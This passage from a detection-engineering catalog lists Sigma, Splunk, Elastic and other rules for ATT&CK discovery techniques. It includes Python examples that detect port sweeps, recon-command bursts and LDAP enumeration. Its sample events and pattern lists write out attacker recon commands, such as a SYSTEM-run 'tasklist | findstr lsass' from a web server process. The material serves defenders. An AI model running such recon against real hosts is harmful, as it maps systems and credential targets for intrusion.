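        ports[(s.src, s.dst, _bucket(s.ts, window))].add(s.dst_port)
    return sorted({(src, dst) for (src, dst, _), p in ports.items() if len(p) >= min_ports})


def port_sweeps(sessions, window=timedelta(minutes=1), min_hosts=10, external_only=True):
    """One source touching the same port on >= min_hosts destinations per window.
    external_only mirrors the 'from External Network' rule; an internal sweep
    (SMB discovery from a compromised workstation) needs it switched off."""
    hosts = defaultdict(set)
    for s in sessions:
        if external_only and not is_external(s.src):
            continue
        hosts[(s.src, s.dst_port, _bucket(s.ts, window))].add(s.dst)
    return sorted({(src, port) for (src, port, _), h in hosts.items() if len(h) >= min_hosts})


# Constructed sample traffic (not real telemetry).
_T0 = datetime(2024, 5, 1, 9, 0, 0)
SAMPLE_SESSIONS = (
    # vertical scan: 40 ports on one host within 20 s
    [NetSession(_T0 + timedelta(seconds=i / 2), "10.0.0.5", "10.0.1.20", 1 + i) for i in range(40)]
    # external sweep of TCP/445 across 30 hosts
    + [NetSession(_T0 + timedelta(seconds=i), "203.0.113.9", f"10.0.2.{i}", 445) for i in range(1, 31)]
    # internal SSH sweep across 15 hosts, two minutes later
    + [NetSession(_T0 + timedelta(minutes=2, seconds=i), "10.0.0.5", f"10.0.3.{i}", 22) for i in range(1, 16)]
    # ordinary repeated HTTPS from another client: must stay quiet
    + [NetSession(_T0 + timedelta(seconds=5 * i), "10.0.0.7", "10.0.1.20", 443) for i in range(12)]
)

if __name__ == "__main__":
    print("port scans:", port_scans(SAMPLE_SESSIONS))
    print("external sweeps:", port_sweeps(SAMPLE_SESSIONS))
    print("all sweeps:", port_sweeps(SAMPLE_SESSIONS, external_only=False))
```

The internal SSH sweep in the sample is the caveat worth keeping in mind when tuning the external-only rule: it is invisible until `external_only` is dropped, at which point the threshold, not the source network, is what keeps routine management traffic quiet.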
System Network Connections Discovery T1049 22 rules
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Splunk GetNetTcpconnection with PowerShell production
- Splunk GetNetTcpconnection with PowerShell Script Block production
- Sigma HackTool - SharpView Execution test
- Sigma Net.EXE Execution test
- Splunk Network Connection Discovery With Arp production
- Splunk Network Connection Discovery With Netstat production
- Sigma Potential Pikabot Discovery Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerView_SharpView Commands (PowerShell)
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Splunk System Network Connections Discovery - Windows (PowerShell)
- Splunk System Network Connections Discovery - Windows (Sysmon)
- Splunk System Network Connections Discovery - Windows (Windows Event Log)
- Sigma System Network Connections Discovery Via Net.EXE test
- Sigma Use Get-NetTCPConnection test
- Sigma Use Get-NetTCPConnection - PowerShell Module test
- Splunk Windows Network Connection Discovery Via Net production
- Splunk Windows System Network Connections Discovery Netsh production
Process Discovery T1057 18 rules
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma HackTool - PCHunter Execution test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Process Discovery stable
- Elastic Process Discovery Using Built-in Tools production
- Sigma Recon Command Output Piped To Findstr.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Process Discovery With Get-Process test
- Sigma Suspicious Tasklist Discovery Command test
- Elastic System Service Discovery through built-in Windows Utilities production
- Splunk Windows Process Commandline Discovery production
Permission Groups Discovery T1069 89 rules
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory Group Enumeration With Get-AdGroup test
- Sigma AD Groups Or Users Enumeration Using PowerShell - PoshModule test
- Sigma AD Groups Or Users Enumeration Using PowerShell - ScriptBlock test
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Sigma BloodHound Collection Files test
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Splunk Domain Group Discovery with Adsisearcher production
- Splunk Domain Group Discovery With Dsquery production
- Splunk Domain Group Discovery With Wmic production
- Sigma Domain group enumeration experimental
- Splunk Elevated Group Discovery with PowerView production
- Splunk Elevated Group Discovery With Wmic production
- Elastic Enumeration of Administrator Accounts production
- Splunk Get WMIObject Group Discovery production
- Splunk Get WMIObject Group Discovery with Script Block Logging production
- Splunk GetAdGroup with PowerShell production
- Splunk GetAdGroup with PowerShell Script Block production
- Splunk GetDomainGroup with PowerShell production
- Splunk GetDomainGroup with PowerShell Script Block production
- Splunk GetWmiObject Ds Group with PowerShell production
- Splunk GetWmiObject Ds Group with PowerShell Script Block production
- Sigma Group discovery (command)
- Sigma Group discovery (PowerShell)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - SharpView Execution test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Kusto LDAP reconnaissance via search filters
- Sigma Local domain group enumeration experimental
- Sigma Local group enumeration triggered by Azure Virtual machine recovery tool stable
- Sigma Local Groups Reconnaissance Via Wmic.EXE test
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Sigma Permission Check Via Accesschk.EXE test
- Splunk Permission Groups Discovery: Domain Groups (PowerShell)
- Splunk Permission Groups Discovery: Domain Groups (Sysmon)
- Splunk Permission Groups Discovery: Domain Groups (Windows Event Log)
- Splunk Permission Groups Discovery: Local Groups (PowerShell)
- Splunk Permission Groups Discovery: Local Groups (Sysmon)
- Splunk Permission Groups Discovery: Local Groups (Windows Event Log)
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Elastic Potential Enumeration via Active Directory Web Service production
- Splunk PowerShell Get LocalGroup Discovery production
- Splunk Powershell Get LocalGroup Discovery with Script Block Logging production
- Splunk PowerView_SharpView Commands (PowerShell)
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- YARA-L Recon Environment Enumeration Active Directory CISA Report
- Sigma Reconnaissance Activity test
- Sigma Remote local admin group enumeration via SharpHound experimental
- Elastic Remote System Discovery Commands production
- Sigma Renamed AdFind Execution test
- Sigma Sensitive SAM domain user & groups discovery (native) experimental
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Sigma Suspicious Get Information for SMB Share test
- Sigma Suspicious Get Information for SMB Share - PowerShell Module test
- Sigma Suspicious Get Local Groups Information test
- Sigma Suspicious Get Local Groups Information - PowerShell test
- Elastic Whoami Process Activity production
- Elastic Windows Account or Group Discovery production
- Splunk Windows Admin Permission Discovery production
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows Group Discovery Via Net production
- Splunk Windows Ldifde Directory Object Behavior production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk Windows Sensitive Group Discovery With Net production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Wmic Group Discovery production
Permission Groups Discovery: Local Groups T1069.001 37 rules
- Sigma AD Groups Or Users Enumeration Using PowerShell - PoshModule test
- Sigma AD Groups Or Users Enumeration Using PowerShell - ScriptBlock test
- Sigma BloodHound Collection Files test
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Elastic Enumeration of Administrator Accounts production
- Splunk Get WMIObject Group Discovery production
- Splunk Get WMIObject Group Discovery with Script Block Logging production
- Sigma Group discovery (command)
- Sigma Group discovery (PowerShell)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma Local domain group enumeration experimental
- Sigma Local group enumeration triggered by Azure Virtual machine recovery tool stable
- Sigma Local Groups Reconnaissance Via Wmic.EXE test
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Sigma Permission Check Via Accesschk.EXE test
- Splunk PowerShell Get LocalGroup Discovery production
- Splunk Powershell Get LocalGroup Discovery with Script Block Logging production
- Sigma Remote local admin group enumeration via SharpHound experimental
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Sigma Suspicious Get Information for SMB Share test
- Sigma Suspicious Get Information for SMB Share - PowerShell Module test
- Sigma Suspicious Get Local Groups Information test
- Sigma Suspicious Get Local Groups Information - PowerShell test
- Elastic Windows Account or Group Discovery production
- Splunk Windows Admin Permission Discovery production
- Splunk Windows Group Discovery Via Net production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Wmic Group Discovery production
Permission Groups Discovery: Domain Groups T1069.002 66 rules
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory Group Enumeration With Get-AdGroup test
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Sigma BloodHound Collection Files test
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Splunk Domain Group Discovery with Adsisearcher production
- Splunk Domain Group Discovery With Dsquery production
- Splunk Domain Group Discovery With Wmic production
- Sigma Domain group enumeration experimental
- Splunk Elevated Group Discovery with PowerView production
- Splunk Elevated Group Discovery With Wmic production
- Elastic Enumeration of Administrator Accounts production
- Splunk GetAdGroup with PowerShell production
- Splunk GetAdGroup with PowerShell Script Block production
- Splunk GetDomainGroup with PowerShell production
- Splunk GetDomainGroup with PowerShell Script Block production
- Splunk GetWmiObject Ds Group with PowerShell production
- Splunk GetWmiObject Ds Group with PowerShell Script Block production
- Sigma Group discovery (command)
- Sigma Group discovery (PowerShell)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - SharpView Execution test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Kusto LDAP reconnaissance via search filters
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Splunk Permission Groups Discovery: Domain Groups (PowerShell)
- Splunk Permission Groups Discovery: Domain Groups (Sysmon)
- Splunk Permission Groups Discovery: Domain Groups (Windows Event Log)
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Elastic Potential Enumeration via Active Directory Web Service production
- Splunk PowerView_SharpView Commands (PowerShell)
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- YARA-L Recon Environment Enumeration Active Directory CISA Report
- Sigma Reconnaissance Activity test
- Elastic Remote System Discovery Commands production
- Sigma Renamed AdFind Execution test
- Sigma Sensitive SAM domain user & groups discovery (native) experimental
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Elastic Windows Account or Group Discovery production
- Splunk Windows Group Discovery Via Net production
- Splunk Windows Ldifde Directory Object Behavior production
- Splunk Windows Sensitive Group Discovery With Net production
- Splunk Windows SOAPHound Binary Execution production
Permission Groups Discovery: Cloud Groups T1069.003 1 rule
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
System Information Discovery T1082 64 rules
- Sigma Audit policy enumerated experimental
- Sigma CMD Shell Output Redirect test
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Splunk Event Logs Queried for RDP Sessions (PowerShell)
- Splunk Event Logs Queried for RDP Sessions (Sysmon)
- Splunk Event Logs Queried for RDP Sessions (Windows Event Log)
- Sigma HackTool - PCHunter Execution test
- Sigma HackTool - winPEAS Execution test
- YARA-L Hacktool - WinPEAS Execution Patterns
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Sigma Network Reconnaissance Activity test
- Splunk Potential PowerShell Post-Exploitation Activity (Sysmon)
- Splunk Potential PowerShell Post-Exploitation Activity (Windows Event Log)
- Sigma Potential Product Class Reconnaissance Via Wmic.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Splunk Potential Target Discovery via PowerShell Event Log Queries (PowerShell)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - System Informer Execution test
- YARA-L Recon Environment Enumeration System CISA Report
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Sigma Suspicious Execution of Hostname test
- Sigma Suspicious Execution of Systeminfo test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Sigma Suspicious Kernel Dump Using Dtrace test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Query of MachineGUID test
- Sigma System Disk And Volume Reconnaissance Via Wmic.EXE test
- Splunk System Enumeration with WMIC (Sysmon)
- Splunk System Enumeration with WMIC (Windows Event Log)
- Splunk System Information Discovery - Windows (PowerShell)
- Splunk System Information Discovery - Windows (Sysmon)
- Splunk System Information Discovery - Windows (Windows Event Log)
- Splunk System Information Discovery Detection production
- Sigma System Information Discovery via Registry Queries experimental
- Elastic System Information Discovery via Windows Command Shell production
- Sigma System Information Discovery Via Wmic.EXE test
- Sigma Uncommon System Information Discovery Via Wmic.EXE test
- Splunk Web Servers Executing Suspicious Processes experimental
- Splunk Windows Information Discovery Fsutil production
- Splunk Windows PowerShell Invoke-RestMethod IP Information Collection production
- Splunk Windows PsTools Recon Usage production
- Elastic Windows System Information Discovery production
- Splunk Windows WinPEAS PowerShell Script Execution production
- Splunk Windows Wmic CPU Discovery production
- Splunk Windows Wmic DiskDrive Discovery production
- Splunk Windows Wmic Memory Chip Discovery production
- Splunk Windows Wmic Network Discovery production
- Splunk Windows Wmic Systeminfo Discovery production
- Elastic Wireless Credential Dumping using Netsh Command production
- Splunk WMIC Host Reconniassance (PowerShell)
- Splunk WMIC Host Reconniassance (Sysmon)
- Splunk WMIC Host Reconniassance (Windows Event Log)
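The host-discovery lists under T1033, T1057 and T1082 are dominated by command-line rules on the same handful of built-in binaries (whoami, tasklist, systeminfo, net, ipconfig), plus a correlation rule, Common Recon Commands in Short Burst, that counts them per host and user. The block below is an added example that runs predicates of that shape over constructed process-creation events; the predicates approximate what the titles Whoami.EXE Execution With Output Option, Whoami.EXE Execution From Privileged Process and Recon Command Output Piped To Findstr.EXE imply and are not the catalog's parsed logic for those rules. The recon-binary list, burst window and sample events are assumptions.

```python
"""Added example: vendor-neutral predicates for the host-discovery rules
above, run over constructed Sysmon EID 1 / Security 4688 style events.
Predicates approximate the rule titles; lists, window and sample events
are assumptions, not the catalog's parsed logic."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    host: str
    user: str
    image: str         # full path of the created process
    cmdline: str
    parent_image: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Binaries counted as "common recon commands" (assumed list).
RECON_BINARIES = {
    "whoami.exe", "hostname.exe", "systeminfo.exe", "ipconfig.exe", "net.exe", "net1.exe",
    "tasklist.exe", "nltest.exe", "quser.exe", "qwinsta.exe", "query.exe", "netstat.exe", "arp.exe",
}
# Command text a recon-then-filter pipeline carries (assumed list).
RECON_COMMANDS = ("tasklist", "net user", "net group", "net localgroup",
                  "whoami", "systeminfo", "ipconfig", "netstat", "qwinsta")
PRIVILEGED_USERS = {"nt authority\\system", "nt authority\\local service", "nt authority\\network service"}


def whoami_with_output_option(e: ProcEvent) -> bool:
    """whoami.exe writing to a file (>) or changing output format (/fo)."""
    cl = e.cmdline.lower()
    return _basename(e.image) == "whoami.exe" and (">" in cl or "/fo " in cl)


def whoami_from_privileged_process(e: ProcEvent) -> bool:
    """whoami.exe already running as SYSTEM or a service account: the usual
    first command after a webshell or service exploit lands."""
    return _basename(e.image) == "whoami.exe" and e.user.lower() in PRIVILEGED_USERS


def recon_output_piped_to_findstr(e: ProcEvent) -> bool:
    """A recon command whose output is piped into findstr to cherry-pick lines."""
    cl = e.cmdline.lower()
    return "|" in cl and "findstr" in cl and any(c in cl for c in RECON_COMMANDS)


RULES = {
    "whoami_with_output_option": whoami_with_output_option,
    "whoami_from_privileged_process": whoami_from_privileged_process,
    "recon_output_piped_to_findstr": recon_output_piped_to_findstr,
}


def run_rules(events):
    """Map rule name -> indices of matching events (single-event rules)."""
    hits = {name: [] for name in RULES}
    for idx, e in enumerate(events):
        for name, pred in RULES.items():
            if pred(e):
                hits[name].append(idx)
    return hits


def recon_bursts(events, window=timedelta(seconds=60), min_distinct=4):
    """(host, user) pairs running >= min_distinct different recon binaries
    inside `window`; sliding window over time-sorted events, one alert per pair."""
    per_key = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev.ts):
        if _basename(e.image) in RECON_BINARIES:
            per_key[(e.host, e.user)].append(e)
    hits = []
    for key, evs in per_key.items():
        start = 0
        for end in range(len(evs)):
            while evs[end].ts - evs[start].ts > window:
                start += 1
            distinct = sorted({_basename(x.image) for x in evs[start:end + 1]})
            if len(distinct) >= min_distinct:
                hits.append((key, evs[start].ts, evs[end].ts, distinct))
                break
    return hits


# Constructed sample events (not real telemetry).
_T0 = datetime(2024, 5, 1, 9, 0, 0)
_S32 = "C:\\Windows\\System32\\"
_CMD, _W3WP = _S32 + "cmd.exe", _S32 + "inetsrv\\w3wp.exe"
SAMPLE_EVENTS = [
    ProcEvent(_T0, "WS01", "CORP\\jdoe", _S32 + "whoami.exe", "whoami /all > C:\\Users\\Public\\w.txt", _CMD),
    ProcEvent(_T0 + timedelta(seconds=10), "WS01", "CORP\\jdoe", _S32 + "hostname.exe", "hostname", _CMD),
    ProcEvent(_T0 + timedelta(seconds=20), "WS01", "CORP\\jdoe", _S32 + "net.exe", "net user", _CMD),
    ProcEvent(_T0 + timedelta(seconds=30), "WS01", "CORP\\jdoe", _S32 + "ipconfig.exe", "ipconfig /all", _CMD),
    ProcEvent(_T0 + timedelta(seconds=40), "WS01", "CORP\\jdoe", _S32 + "systeminfo.exe", "systeminfo", _CMD),
    ProcEvent(_T0 + timedelta(minutes=5), "WEB01", "NT AUTHORITY\\SYSTEM", _S32 + "whoami.exe", "whoami", _W3WP),
    ProcEvent(_T0 + timedelta(minutes=6), "WEB01", "NT AUTHORITY\\SYSTEM", _CMD,
              'cmd.exe /c tasklist /v | findstr /i "lsass"', _W3WP),
    ProcEvent(_T0 + timedelta(hours=1), "ADM01", "CORP\\svc-backup", _S32 + "net.exe",
              "net use Z: \\\\fs01\\backups", _CMD),  # routine; must stay quiet
]

if __name__ == "__main__":
    for name, idxs in run_rules(SAMPLE_EVENTS).items():
        print(f"{name}: {idxs}")
    for key, first, last, bins in recon_bursts(SAMPLE_EVENTS):
        print(f"burst on {key}: {bins} between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

Note the split the sample makes visible: the WEB01 events trip single-event rules because the user and the pipe are anomalous on their own, while the WS01 commands are individually unremarkable and only the burst correlation catches them. Both shapes are needed; tuning a burst rule means choosing the window and distinct-binary threshold against your own baseline of admin scripting.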
File and Directory Discovery T1083 17 rules
- Sigma DirLister Execution test
- Splunk File and Directory Discovery Output to File - Windows (PowerShell)
- Splunk File and Directory Discovery Output to File - Windows (Sysmon)
- Splunk File and Directory Discovery Output to File - Windows (Windows Event Log)
- Sigma HackTool - PCHunter Execution test
- Sigma Notepad Password Files Discovery experimental
- Sigma Powershell Directory Enumeration test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Sensitive File Discovery test
- Sigma PUA - Seatbelt Execution test
- Sigma PUA - TruffleHog Execution experimental
- Splunk Remote Share Directory Listing - Windows (PowerShell)
- Splunk Remote Share Directory Listing - Windows (Sysmon)
- Splunk Remote Share Directory Listing - Windows (Windows Event Log)
- Elastic System Information Discovery via Windows Command Shell production
- Sigma Turla Group Lateral Movement test
- Sigma WannaCry Ransomware Activity test
Account Discovery T1087 132 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Active Directory Computers Enumeration With Get-AdComputer test
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory honeypot enumerated by a suspicious host (Bloodhound) experimental
- Sigma Active Directory Structure Export Via Csvde.EXE test
- Sigma AD Privileged Users or Groups Reconnaissance test
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Splunk AdsiSearcher Account Discovery production
- Kusto ADWS Connection from Process Injection Target
- Kusto ADWS Connection from Unexpected Binary
- Sigma BloodHound Collection Files test
- Sigma Chopper Webshell Process Pattern test
- Splunk Common Active Directory Commands (PowerShell)
- Splunk Common Active Directory Commands (Sysmon)
- Splunk Common Active Directory Commands (Windows Event Log)
- Splunk Common Exchange Recon cmdlets (PowerShell)
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Splunk CSVDE Export Active Directory (PowerShell)
- Splunk CSVDE Export Active Directory (Sysmon)
- Splunk CSVDE Export Active Directory (Windows Event Log)
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (PowerShell)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Sysmon)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Windows Event Log)
- Splunk Domain Account Discovery with Dsquery production
- Splunk Domain Account Discovery with Wmic production
- Sigma Domain group enumeration experimental
- Splunk Enumerate Users Local Group Using Telegram production
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Elastic Enumeration of Administrator Accounts production
- Splunk Get ADUser with PowerShell production
- Splunk Get ADUser with PowerShell Script Block production
- Splunk Get DomainUser with PowerShell production
- Splunk Get DomainUser with PowerShell Script Block production
- Splunk GetLocalUser with PowerShell production
- Splunk GetLocalUser with PowerShell Script Block production
- Splunk GetWmiObject DS User with PowerShell production
- Splunk GetWmiObject DS User with PowerShell Script Block production
- Splunk GetWmiObject User Account with PowerShell production
- Splunk GetWmiObject User Account with PowerShell Script Block production
- Sigma Group discovery (command)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - SOAPHound Execution test
- Sigma HackTool - winPEAS Execution test
- Sigma Hacktool Ruler test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Kusto Large number of AD objects accessed by user
- Kusto LDAP reconnaissance via search filters
- Splunk Local Account Discovery With Wmic production
- Sigma Local Accounts Discovery test
- Sigma Local domain group enumeration experimental
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Sigma Net.EXE Execution test
- Sigma Network Reconnaissance Activity test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Sigma Potential AD User Enumeration From Non-Machine Account test
- Elastic Potential Enumeration via Active Directory Web Service production
- Sigma Potential Pikabot Discovery Activity test
- Splunk Potential PowerShell Post-Exploitation Activity (Sysmon)
- Splunk Potential PowerShell Post-Exploitation Activity (Windows Event Log)
- Sigma Potentially Suspicious EventLog Recon Activity Using Log Query Utilities test
- Splunk PowerHuntShares Commands (PowerShell)
- Splunk PowerHuntShares Commands (Sysmon)
- Splunk PowerHuntShares Commands (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- Sigma PUA - AdFind.EXE Execution experimental
- Sigma PUA - Seatbelt Execution test
- Sigma PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE test
- YARA-L Purple Knight Tool Execution Detected
- Sigma Reconnaissance Activity test
- Sigma Renamed AdFind Execution test
- Splunk SchCache Change By App Connect And Create ADSI Object production
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Sigma Suspicious Group And Account Reconnaissance Activity Using Net.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Sigma Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet test
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (native commands) experimental
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (PowerShell) experimental
- Sigma Suspicious Use of PsLogList test
- Sigma Uncommon Connection to Active Directory Web Services test
- Sigma User properties enumeration via commandline
- Splunk User_Domain Enumeration Tool - Windows (PowerShell)
- Splunk User_Domain Enumeration Tool - Windows (Sysmon)
- Splunk User_Domain Enumeration Tool - Windows (Windows Event Log)
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Splunk Windows Account Discovery for None Disable User Account production
- Splunk Windows Account Discovery for Sam Account Name production
- Splunk Windows Account Discovery With NetUser PreauthNotRequire production
- Elastic Windows Account or Group Discovery production
- Splunk Windows AD Abnormal Object Access Activity production
- Splunk Windows AD Privileged Object Access Activity production
- Splunk Windows Domain Account Discovery Via Get-NetComputer production
- Splunk Windows Find Domain Organizational Units with GetDomainOU production
- Splunk Windows Find Interesting ACL with FindInterestingDomainAcl production
- Splunk Windows Forest Discovery with GetForestDomain production
- Splunk Windows Get Local Admin with FindLocalAdminAccess production
- Splunk Windows Linked Policies In ADSI Discovery production
- Splunk Windows Root Domain linked policies Discovery production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Windows Special Privileged Logon On Multiple Hosts production
- Splunk Windows Suspect Process With Authentication Traffic production
- Splunk Windows User Discovery Via Net production
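Most rules in the T1069 and T1087 lists key on the command line of the tool issuing the query (Get-ADComputer, AdFind, net group, SharpHound), while a few (LDAP reconnaissance via search filters, Potential Active Directory Reconnaissance/Enumeration Via LDAP, Suspicious Access to LDAP Attributes) look at the LDAP search filter itself, which is the one artefact every tool has to send. The block below is an added example of that second approach: it parses RFC 4515 filters and flags the conditions behind the SPN-enumeration, unconstrained/constrained-delegation, adminCount and pre-auth-not-required rules above when they are seen at the LDAP layer. The category names, the two-category threshold and the sample queries are assumptions for illustration, not the catalog's own parsed logic.

```python
"""Added example: classify LDAP search filters for the AD enumeration rules
above. Filters are parsed per RFC 4515 into leaves; category names,
thresholds and the sample queries are assumptions, not catalog logic."""
import re
from collections import defaultdict

LDAP_BIT_AND = "1.2.840.113556.1.4.803"   # matching-rule OID for bitwise AND
UAC_TRUSTED_FOR_DELEGATION = 0x00080000   # 524288: unconstrained delegation
UAC_DONT_REQ_PREAUTH = 0x00400000         # 4194304: AS-REP roastable
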